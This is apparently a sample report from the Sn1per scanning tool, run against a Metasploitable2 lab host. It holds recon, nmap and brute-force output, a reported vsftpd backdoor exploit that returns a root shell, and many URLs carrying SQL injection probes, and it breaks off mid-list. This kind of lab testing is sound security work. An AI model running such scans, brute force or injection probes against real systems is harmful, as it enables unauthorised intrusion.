Skip to content

Instantly share code, notes, and snippets.

@1N3

1N3/Sn1per Sample Report

Created September 7, 2015 15:55
Show Gist options
  • Save 1N3/070d14c364e5f23bfe5e to your computer and use it in GitHub Desktop.
Save 1N3/070d14c364e5f23bfe5e to your computer and use it in GitHub Desktop.
Download ZIP
Sn1per Sample Report
Raw
Sn1per Sample Report
This file has been truncated, but you can view the full file.
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com
+ -- --=[sn1per v1.3 by 1N3
################################### Running recon #################################
;; connection timed out; no servers could be reached
Host 113.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
; <<>> DiG 9.9.5-9+deb8u2-Debian <<>> -x 192.168.1.113
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10662
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;113.1.168.192.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800
;; Query time: 19 msec
;; SERVER: 206.248.154.22#53(206.248.154.22)
;; WHEN: Sun Sep 06 17:06:03 EDT 2015
;; MSG SIZE rcvd: 114
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=192.168.1.113?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
#
NetRange: 192.168.0.0 - 192.168.255.255
CIDR: 192.168.0.0/16
NetName: PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED
NetHandle: NET-192-168-0-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: IANA Special Use
OriginAS:
Organization: Internet Assigned Numbers Authority (IANA)
RegDate: 1994-03-15
Updated: 2013-08-30
Comment: These addresses are in use by many millions of independently operated networks, which might be as small as a single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They are only intended for use within a private context and traffic that needs to cross the Internet will need to use a different, unique address.
Comment:
Comment: These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry. The traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on logs or in e-mail records. Please refer to http://www.iana.org/abuse/answers
Comment:
Comment: These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best Current Practice document, RFC 1918 which can be found at:
Comment: http://datatracker.ietf.org/doc/rfc1918
Ref: http://whois.arin.net/rest/net/NET-192-168-0-0-1
OrgName: Internet Assigned Numbers Authority
OrgId: IANA
Address: 12025 Waterfront Drive
Address: Suite 300
City: Los Angeles
StateProv: CA
PostalCode: 90292
Country: US
RegDate:
Updated: 2012-08-31
Ref: http://whois.arin.net/rest/org/IANA
OrgTechHandle: IANA-IP-ARIN
OrgTechName: ICANN
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [email protected]
OrgTechRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN
OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: ICANN
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [email protected]
OrgAbuseRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#
*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.6 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
*******************************************************************
[-] Searching in Google:
Searching 0 results...
Searching 100 results...
[+] Emails found:
------------------
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
@192.168.1.113
[email protected]
[email protected]
[email protected]
[email protected]
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.6 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
*******************************************************************
[-] Searching in Bing:
Searching 50 results...
Searching 100 results...
[+] Emails found:
------------------
@192.168.1.113
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.6 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
*******************************************************************
[-] Searching in Linkedin..
Searching 100 results..
Users from Linkedin:
====================
*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.6 *
* Coded by Christian Martorella *
* Edge-Security Research *
* [email protected] *
*******************************************************************
[-] Searching in 123People..
Searching 0 results...
Searching 100 results...
Users from 123People:
=====================
[+] Emails found:
------------------
No emails found
[+] Hosts found in search engines:
------------------------------------
dnsenum.pl VERSION:1.2.3
----- 192.168.1.113 -----
Host's addresses:
__________________
Name Servers:
______________
192.168.1.113 NS record query failed: NXDOMAIN
Error: no name server (NS) entry for domain 192.168.1.113. exists
+ -- --=[Checking for SPF records on 192.168.1.113...
################################### Pinging host ###################################
PING 192.168.1.113 (192.168.1.113) 56(84) bytes of data.
64 bytes from 192.168.1.113: icmp_seq=1 ttl=64 time=0.414 ms
--- 192.168.1.113 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.414/0.414/0.414/0.000 ms
################################### Running port scan ##############################
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00044s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2015-09-05T12:13:03+00:00; -1d08h53m38s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 43932/tcp mountd
| 100005 1,2,3 58097/udp mountd
| 100021 1,3,4 39515/udp nlockmgr
| 100021 1,3,4 41962/tcp nlockmgr
| 100024 1 38115/udp status
|_ 100024 1 43758/tcp status
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 43932/tcp mountd
| 100005 1,2,3 58097/udp mountd
| 100021 1,3,4 39515/udp nlockmgr
| 100021 1,3,4 41962/tcp nlockmgr
| 100024 1 38115/udp status
|_ 100024 1 43758/tcp status
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 53
| Version: .0.51a-3ubuntu5
| Thread ID: 100465
| Capabilities flags: 43564
| Some Capabilities: SupportsTransactions, LongColumnFlag, SupportsCompression, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, SwitchToSSLAfterHandshake
| Status: Autocommit
|_ Salt: .iHhWW23JWY9Ph9"?Ti3
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 3 days, 21:01:56
| source ident: nmap
| source host: C4A81015.78DED367.FFFA6D49.IP
|_ error: Closing Link: nwqhmpvop[192.168.1.111] (Quit: nwqhmpvop)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2015-09-05T08:13:01-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms 192.168.1.113
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.83 seconds
################################### Running Intrusive Scans ########################
+ -- --=[Port 21 opened... running tests...
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 1951 guesses in 602 seconds, average tps: 3
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523 OSVDB:73573
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| http://osvdb.org/73573
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 603.82 seconds
+ -- --=[Port 22 opened... running tests...
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:16 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00018s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
+ -- --=[Port 23 opened... running tests...
Using config file torch.conf...
Loading include and plugin ...
###############################################################
# Cisco Torch Mass Scanner #
# Becase we need it... #
# http://www.arhont.com/cisco-torch.pl #
###############################################################
List of targets contains 1 host(s)
15268: Checking 192.168.1.113 ...
HUH db not found, it should be in fingerprint.db
Skipping Telnet fingerprint
*** Found TFTP server
HUH db not found, it should be in tfingerprint.db
Skipping tftp fingerprint
--->
- All scans done. Cisco Torch Mass Scanner -
---> Exiting.
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:17 EDT
Nmap scan report for 192.168.1.113
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
| telnet-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 2069 guesses in 603 seconds, average tps: 3
| telnet-encryption:
|_ Telnet server does not support encryption
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 604.67 seconds
+ -- --=[Port 25 opened... running tests...
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
| smtp-brute:
|_ ERROR: Failed to retrieve authentication mechanisms form server
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service Info: Host: metasploitable.localdomain
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
ERROR: Can't open username file BruteX/simple-users.txt: No such file or directory
+ -- --=[Port 53 opened... running tests...
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT
Nmap scan report for 192.168.1.113
Host is up (0.0016s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
MAC Address: 00:0C:29:0E:B0:99 (VMware)
Service Info: Host: metasploitable.localdomain
Host script results:
|_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.75 seconds
+ -- --=[Port 80 opened... running tests...
console.error:
[CustomizableUI]
Custom widget with id loop-button does not return a valid node
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
|
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
|
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/edit/TWiki/
|
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
|
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html
| Form id:
| Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
|
| Path: http://192.168.1.113/mutillidae/./index.php?page=register.php
| Form id: id-bad-cred-tr
|_ Form action: index.php?page=register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-drupal-modules:
| http-email-harvest:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
| [email protected]
|_ [email protected]
| http-enum:
| /tikiwiki/: Tikiwiki
| /test/: Test page
| /phpinfo.php: Possible information file
| /phpMyAdmin/: phpMyAdmin
| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
| /icons/: Potentially interesting folder w/ directory listing
|_ /index/: Potentially interesting folder
|_http-feed: Couldn't find any feeds.
|_http-frontpage-login: false
| http-headers:
| Date: Sat, 05 Sep 2015 12:34:28 GMT
| Server: Apache/2.2.8 (Ubuntu) DAV/2
| X-Powered-By: PHP/5.2.4-2ubuntu5.10
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
|_http-iis-webdav-vuln: ERROR: This web server is not supported.
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-php-version: Versions from logo query (less accurate): 5.1.3 - 5.1.6, 5.2.0 - 5.2.17
| Versions from credits query (more accurate): 5.2.3 - 5.2.5
|_Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.1.113/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=framing%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=user%2dinfo%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/././index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider
| http://192.168.1.113/mutillidae/./?page=show%2dlog%2ephp%27%20OR%20sqlspider
